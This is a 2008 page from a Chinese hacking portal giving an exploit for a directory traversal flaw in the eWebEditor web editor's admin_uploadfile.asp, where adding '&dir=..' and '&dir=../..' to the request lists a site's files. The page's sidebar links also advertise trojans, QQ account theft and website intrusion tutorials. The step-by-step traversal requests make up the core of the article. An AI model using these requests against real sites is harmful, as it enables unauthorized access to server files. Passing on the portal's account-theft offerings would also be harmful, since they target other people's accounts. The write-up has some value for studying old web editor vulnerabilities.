设为首页  加入收藏  联系我们 繁體中文  

黑客软件:

  漏洞扫描 | 木马间谍 | 加密解密 | 远程控制 | 破坏攻击 | 杀毒软件 | 防火墙类 | OICQ专区 | 黑客必备 | 常用工具 | 网吧攻击
文章中心:   最新资讯 | 黑客技术 | 电脑基础 | 菜鸟文摘 | 网络安全 | 网络技巧 | QQ技巧 | OQ空间代码 | 免费资源 | 编程世界 | 建站技术
素材源码:   论坛相关 | ASP源码 | CGI 源码 | NET 源码 | PHP 源码 | 酷站素材 | 字体素材 | 图片素材 | 友情发布 | 网页模版 | 建站软件
教程动画:   黑客教程 | 黑客编程 | 网站入侵 | 菜鸟教程 | 入侵教程 | 破解教程 | 电子书籍 | 网页制作 | 高级会员 | 综合教程 | 本站原创


   

  您当前的位置:中华隐士黑客联盟 -> 黑客技术 -> 漏洞利用 -> 文章内容 [站内搜索]  

 
ewebeditor遍历路径漏洞
作者:不详  来源:网络  发布时间:2008-1-26 9:30:55  发布人:www.hack86.com
 

此漏洞比较危险...ewebeditor使用范围太广了...(前提也要有管理权限)
eWebEditor 
描述:
eWebEditor是一个所见即所得的在线编辑器。顾名思义,就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。
ewebeditor/admin_uploadfile.asp
过滤不严,造成遍历路径漏洞 
<* 参考:http://www.sebug.net,http://www.ewebeditor.net/ ;*> 
测试方法:
[警 告]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.****.com/../.. 看到整个网站文件了  
建议:暂无http://www.ewebeditor.net/ ;
 
[] [返回上一页] [打 印] [收 藏]
  [相关文章评论]    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 

  利用反向通道与隧道..
Fireworks制作草生草..
Fireworks教程:光芒..
推荐:php手工注入+e..
Vuln Review: Apach..
《Firewall》- 一次..
winzip FileView Ac..
winzip FileView Ac..
Site News page参数..
随机排序中的newid(..


 
免费获得Q币的最新方法
最新免费在线看的电影网站集绵
不用木马,轻松万能偷daoQQ号码
最新QQ空间4.0全屏版效果图!!
新免蟆Q秀,刷红钻的方法
黑客快速入门(强烈推荐)
QQ密码本地破解的原理和方法
8款QQ空间免费开场动画
18岁少女欲6000元卖处女身 救患血..
免费QQ蓝钻体验(附考试答案)
 
卡巴斯基反病毒软件KAV7.0免费送.. 01-30
Windows Server 2003最受关注之缺.. 01-30
美扩大政府网络监听范围 欲借此免.. 01-30
新型诈骗:警惕假冒淘宝网“掏”你.. 01-30
痛打机器狗--360机器狗专杀及免疫.. 01-30
安全检测ASP.net网站实例 01-30
关于Vcasm的多进程反跟踪技术的学.. 01-30
完整的XSS wrom安全检测实例示范.. 01-30
网吧冲钱从概念到实践 01-30
黑客如何利用文件包含漏洞进行网.. 01-30
 
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 访客留言 论坛登录
〖中华隐士黑客联盟〗,Copyright © 2006-2010 WwW.Hack86.Com 闽ICP备:06023304号
站长:小质 QQ:771760,软件发布MAIL:Hack086@21cn.com